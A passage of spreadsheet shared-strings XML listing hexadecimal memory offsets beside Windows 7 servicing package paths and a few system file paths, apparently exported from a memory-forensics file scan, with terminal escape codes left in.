    <t>0xde881038</t>
  </si>
  <si>
    <t>601.17514.m</t>
  </si>
  <si>
    <t>0xde881300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2789645~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8813b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2884256~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8817a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2884256_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde881ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_133_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde881b88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2884256~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde881f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2742599~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8822a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_432_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde882360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~~6.1.7600.16</t>
  </si>
  <si>
    <t>0xde882690</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ICM-Package~31bf3856ad364e35~x86~en-US~6.1.7600.</t>
  </si>
  <si>
    <t>0xde882748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-Package-TopLevel~31bf3856ad364e</t>
  </si>
  <si>
    <t>35~x86~~11.2.</t>
  </si>
  <si>
    <t>9600.16428.</t>
  </si>
  <si>
    <t>0xde882b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~x86~en-U</t>
  </si>
  <si>
    <t>0xde882f18</t>
  </si>
  <si>
    <t>0xde883248</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2789645~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde883300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2385678~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8837b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2425227_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde883b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2425227_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde883ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2789645_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde883f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2425227~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8842a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2820331~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde884360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2534366~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde884748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2998812_RTM~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde884b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2998812~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde884e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_134_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde884f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2385678_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde885260</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2533552_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde885320</t>
  </si>
  <si>
    <t>0xde8853d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde885490</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_35_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde885690</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB2813430~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde885748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RecDisc-SDP-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde885b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2534366_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde885f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2534366_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde886038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3046480~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde886480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB976902~31bf3856ad364e35~x86~~6.1.1.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8867b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_371_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde886868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB958488~31bf3856ad364e35~x86~~6.2.7600.16513.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde886b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_27_for_KB2763523~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde886c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3046480_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde887038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB976902_RTM~31bf3856ad364e35~x86~~6.1.1.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde887300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2729452_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8873b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2763523~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde887868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2750841_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde887b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_131_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde887c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2750841~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde887f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2729452~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8881f0</t>
  </si>
  <si>
    <t>0xde8882a8</t>
  </si>
  <si>
    <t>0xde8884d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde888590</t>
  </si>
  <si>
    <t>0xde8887b0</t>
  </si>
  <si>
    <t>0xde888ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2813430~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde888eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2763523_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde889168</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ShareMedia-ControlPanel-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde8892d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_116_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde889388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde8894f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ICM-Package~31bf3856ad364e35~x86~en-US~6.1.7601.</t>
  </si>
  <si>
    <t>17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8895a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde8897c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_86_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde889878</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde889ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2729452~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde889b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2574819~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde889f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2813430_SP1~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88a250</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2864202~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88a438</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2574819_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88a658</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88a878</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_293_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88ab60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_79_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88af80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_364_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88b038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-MiniLP~31bf3856ad364e35~x86~en-US~7.6.760</t>
  </si>
  <si>
    <t>0.256.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88b300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2888049~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88b630</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2656356~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88b6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2834140_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88bad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2834140~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88beb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2864202_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88c038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_370_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88c298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862152~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88c5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88c680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2808679_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88c9b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2604115~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88ca68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2808679~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88cf18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2888049_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88d038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_123_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88d0f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_124_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88d240</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2893519~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88d770</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~~6.1.7600.16</t>
  </si>
  <si>
    <t>0xde88d828</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3156019_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88db98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3156019~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88de50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862152_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88e1d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2892074~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88e5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-StorageService-Package~31bf3856ad364e35~x86~en-U</t>
  </si>
  <si>
    <t>0xde88e680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2893294_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88ea68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2893294~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88ed98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_28_for_KB2750841~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88ee50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2893519_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88f038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_368_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88f200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2966583~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88f530</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WMIADAP.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde88f5e8</t>
  </si>
  <si>
    <t>0xde88f918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WindowsFoundation-LanguagePack-Package~31bf3856a</t>
  </si>
  <si>
    <t>d364e35~x86~e</t>
  </si>
  <si>
    <t>n-US~6.1.76</t>
  </si>
  <si>
    <t>00.163</t>
  </si>
  <si>
    <t>0xde88f9d0</t>
  </si>
  <si>
    <t>0xde88fdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2892074_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde890038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8900f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2972211~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8905e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2973351_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde890918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Aux-TopLevel~31bf3856ad364e35~x86~~7.6.7600.25</t>
  </si>
  <si>
    <t>6.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8909d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde890db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2966583_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde891238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_149_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8912f0</t>
  </si>
  <si>
    <t>0xde891458</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_165_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde891510</t>
  </si>
  <si>
    <t>0xde891ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Aux-MiniLP~31bf3856ad364e35~x86~en-US~7.6.7600</t>
  </si>
  <si>
    <t>.256.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde891b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2506212_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde891f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2506212~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde892038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2506212_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8923c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-TopLevel~31bf3856ad364e35~x86~~7.6.7600.2</t>
  </si>
  <si>
    <t>56.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde892480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2509553_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde892868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2509553_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde892c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2509553~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde892f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_369_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893140</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2552343_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893470</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Printing-LocalPrinting-Enterprise-Package~31bf38</t>
  </si>
  <si>
    <t>56ad364e35~x8</t>
  </si>
  <si>
    <t>6~~6.1.7600</t>
  </si>
  <si>
    <t>.16385</t>
  </si>
  <si>
    <t>0xde893528</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2552343_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893710</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2552343~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893930</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893a98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2685811~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde893b50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde894200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2585542~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde894530</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_367_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8945e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2564958_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde894918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Networking-MPSSVC-Rules-EnterpriseEdition-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde8949d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2564958_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde894db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2564958~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde895548</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\xpsrchvw.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde895600</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3140245_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde895850</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde895a38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3140245~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde895c38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-StorageService-Package~31bf3856ad364e35~x86~~6.1</t>
  </si>
  <si>
    <t>um_x001B_[0K_x001B_[103</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>0xde895cf0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2585542_RTM~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8963c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2654428_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8966f8</t>
  </si>
  <si>
    <t>0xde8967b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2654428_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde896b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2654428~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde896ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde896f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2585542_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde897248</t>
  </si>
  <si>
    <t>0xde897300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2705219~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8977b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2690533_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde897ae0</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C0</t>
  </si>
  <si>
    <t>018BB1B583473</t>
  </si>
  <si>
    <t>5BFA60CD063</t>
  </si>
  <si>
    <t>B31956</t>
  </si>
  <si>
    <t>0xde897b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2690533_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde897f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2690533~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8982a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_431_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde898360</t>
  </si>
  <si>
